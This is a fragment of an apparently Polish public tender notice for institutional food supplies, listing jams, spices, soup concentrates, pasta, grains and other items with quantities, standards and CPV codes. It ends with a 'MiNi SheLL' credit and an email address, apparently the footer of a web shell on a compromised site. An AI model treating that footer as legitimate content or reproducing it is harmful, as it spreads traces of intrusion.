5) Dżem z czarnej porzeczki nisko słodzony (opak. 10 - 15 kg), PN-A-75100, CPV 15332293-4 - 1200 kg; 
6) Dżem brzoskwiniowy nisko słodzony (opak. 10 - 15 kg), PN-A-75100,CPV 15332293-4 - 1200 kg; 
7) Marmolada wieloowocowa nisko słodzona (opak. 10-15 kg), PN-93/A/75103, CPV 15332230-5 -  2000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.93-4, 15.33.22.90-3, 15.33.22.96-5, 15.33.22.94-1, 15.33.22.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pozostałe artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Papryka mielona ostra (opakowanie 0,5 - 5 kg), PN-A-86955, CPV 15331136-9 - 20 kg; 
2) Papryka mielona słodka (opakowanie 0,5-5 kg), PN-A-86955, CPV 15331136-9 - 20 kg; 
3) Ocet 10% (butelka 0,5 - 1 litr), PN-A-79733, CPV 15871110-8 - 150 l; 
4) Musztarda popularna (opakowanie 1 - 10 kg), PN-A-86964, CPV 15871250-1 - 800 kg; 
5) Ketchup (opakowanie 1 - 10 kg), PN-A-82013, CPV 15871230-5 - 800 kg; 
6) Majonez (opakowanie 1 - 10 kg), PN-A-86950, CPV 15871273-8 - 400 kg; 
7) Chrzan tarty w occie (opakowanie 1 - 10 kg), PN-A-77806, CPV 15331400-1 - 600 kg; 
8) Majeranek (opakowanie 0,5 - 5 kg), PN-A-86958, CPV 15872300-4 - 60 kg; 
9) Liść laurowy (opakowanie 0,5 - 5 kg), BN-65/8132-10, CPV 15890000-3 - 40 kg; 
10) Bazylia (opakowanie 0,5 - 5 kg), PN-A-86959, CPV 15872000-1 - 20 kg; 
11) Czosnek w kostce (opakowanie 0,5 - 5 kg), PN-R-75518, CPV 15872200-3 - 20 kg; 
12) Kwasek cytrynowy (opakowanie 0,5 - 5 kg), PN-81/A-79734, CPV 15890000-3 - 60 kg; 
13) Kawa zbożowa (opakowanie 0,25 - 0,5 kg), PN-A-94013, CPV 15613000-8 - 300 kg; 
14) Herbata indyjska granulowana, PN-ISO-3720, CPV 15863000-5 - 700 kg; 
15) Sos grzybowy koncentrat (opak. do 25 kg), PN-A-94050, CPV 15893100-5 - 300 kg; 
16) Sos pieczarkowy koncentrat (opak. do 5 kg) PN-A-94050, CPV 15893100-5 - 300 kg; 
17) Sos biały koncentrat (opakowanie do 5 kg), PN-A-94050, CPV 15893100-5 - 300 kg; 
18) Sos cygański koncentrat (opakowanie do 5 kg), PN-A-94050, CPV 15893100-5 - 300 kg; 
19) Zupa pieczarkowa koncentrat do gotowania (opak. do 15 kg) PN-A-94050, CPV 15891400-4 -  400 kg; 
20) Zupa barszcz czerwony koncentrat do gotowania (opak. do 15 kg) PN-A-94050, CPV 15891400-4  - 200 kg; 
21) Zupa barszcz biały - koncentrat w płynie (opak. do 1,5 l), PN-A-94050, CPV 15891400-4 - 150 l; 
22) Żur - koncentrat w płynie (opak. do 1,5 l), PN-A-94050, CPV 15891400-4 - 150 l; 
23) Żurek koncentrat do gotowania (opak. do 15 kg) PN-A-94050, CPV 15891400-4 - 400 kg; 
24) Rosół jarzynowy koncentrat (opak. do 5 kg) PN-A-94052, CPV 15891900-9 - 500 kg; 
25) Rosół z kury koncentrat (opakowanie do 5 kg), PN-A-94052, CPV 15891100-1 - 500 kg; 
26) Kostka rosołowa - bulion drobiowy (opak. do 1 kg), PN-A-94052, CPV 15891500-5 - 200 kg; 
27) Kostka rosołowa - bulion wołowy (opak. do 1 kg), PN-A-94052, CPV 15891500-5 - 200 kg; 
28) Przyprawa do bigosu (opakowanie 0,5 - 5 kg), PN-A-86955, CPV 15894000-1 - 25 kg; 
29) Przyprawa do fasoli (opakowanie 0,5 - 5 kg), PN-A-86955, CPV 15894000-1 - 25 kg; 
30) Przyprawa do zup (opakowanie 1 - 5 kg), PN-A-94052, CPV 15871270-7 - 400 kg; 
31) Sól (worki od 1 kg do 25 kg), PN-86/c-84081, CPV 15872400-5 - 1900 kg; 
32) Pieprz naturalny mielony (opak. 0,5 - 5 kg), BN-64/8132-05, CPV 15872100-2 - 95 kg; 
33) Cynamon (opakowanie do 1 kg), PN-A-94051, CPV 15872200-3 - 20 kg; 
34) Budyń waniliowy (opakowanie 5 - 25 kg), PN-A-94051, CPV 15851000-8 - 250 kg; 
35) Budyń owocowy (opakowanie 5 - 25 kg), PN-A-94051, CPV 15851000-8 - 250 kg; 
36) Budyń śmietankowy (opakowanie 5 - 25 kg), PN-A-94051, CPV 15851000-8 - 250 kg; 
37) Budyń czekoladowy (opakowanie 5 - 25 kg), PN-A-94051, CPV 15851000-8 - 250 kg; 
38) Mąka ziemniaczana (opakowanie 1 kg), PN-93/A-74710, CPV 15620000-0 - 200 kg; 
39) Mąka pszenna typ 500 (opakowanie 1 - 25 kg), PN-91/A-74022, CPV 15612100-2 - 5000 kg; 
40) Ryż (worki 5 - 25 kg), BN-85/8062-01, CPV 15611000-4 - 5000 kg; 
41) Kasza manna (opakowanie 1 - 25 kg), PN-88/A-74036, CPV 15613000-8 - 400 kg; 
42) Kasza jęczmienna drobna (worki do 25 kg), PN-87/A-74203, CPV 15613000-8 - 1200 kg; 
43) Kasza jęczmienna gruba (worki do 25 kg), PN-87/A-74203, CPV 15613000-8 - 3000 kg; 
44) Kasza gryczana palona (worki do 25 kg), PN-87/A-74203, CPV 15613000-8 - 1200 kg; 
45) Płatki owsiane (worki do 25 kg), PN-82/A-74037, CPV 15613380-5 - 250 kg; 
46) Bułka tarta (opakowanie 1 kg), PN-A-74113, CPV 15811500-1 - 200 kg; 
47) Makaron rurka (opakowanie 5 - 50 kg), PN-93/A-741133, CPV 15851100-9 - 2000 kg; 
48) Makaron świderek (opakowanie 5 - 50 kg), PN-A-74113, CPV 15851100-9 - 2000 kg; 
49) Makaron muszelka (opakowanie 5 - 50 kg), PN-A-74113, CPV 15851100-9 - 2000 kg; 
50) Makaron spaghetti (opakowanie 5 - 50 kg), PN-A-74113, CPV 15851100-9 - 2000 kg; 
51) Kukurydza konserwowa puszka z samootwieraczem 0,5 - 5 kg lub słoik 0,5 - 1 litra, PN-ISO-6540, CPV 15331470-2 - 400 kg; 
52) Groszek konserwowy puszka z samootwieraczem 0,5 - 5 kg lub słoik 0,5 - 1 litra, PN-81/R-65032, CPV 15331462-3 - 500 kg; 
53) Szczaw konserwowy (opakowanie 1 - 3 kg), BN-79/8122-07, CPV 15331400-1 - 450 kg; 
54) Koncentrat pomidorowy 30% (opak. 1 - 10 kg), PN-75/A-77601, CPV 15331427-6 - 3500 kg; 
55) Granulat sojowy (opakowanie 5 - 25 kg), PN-75/R-65031, CPV 15331150-3 - 300 kg; 
56) Kostka sojowa (opakowanie 5 - 25 kg), PN-75/R-65031, CPV 15331150-3	 - 350 kg; 
57) Woda mineralna niegazowana (opak. do 1,5 l), Atest PZH, CPV 15981000-8 - 6500 l; 
58) Olej uniwersalny (opakowanie 1 - 5 litrów), PN-86/A-86908, CPV 15411200-4 - 1500 l; 
59) Fasola jednolita biała (worki do 25 kg), PN-75/R-65031, CPV 15331131-4 - 1500 kg; 
60) Fasola Piękny Jaś (worki do 25 kg), PN-75/R-65031, CPV 15331131-4 - 1500 kg; 
61) Miód pszczeli wielokwiatowy (1 szt. 25 - 100 g), PN-88/A-77626, CPV 15831600-8 - 30 kg; 
62) Cukier (worki od 1 kg do 25 kg), PN-72/A-74850, CPV 15831200-4 - 6500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4, 15.85.11.00-9, 15.33.14.27-6, 15.61.21.00-2, 15.61.30.00-8, 15.61.21.00-2, 15.33.14.31-4, 15.85.10.00-8, 15.41.12.00-4, 15.89.31.00-5, 15.89.14.00-4, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.73-8, 15.87.21.00-2, 15.87.24.00-5, 15.89.19.00-9, 15.33.14.62-3, 15.89.11.00-1, 15.89.15.00-5, 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com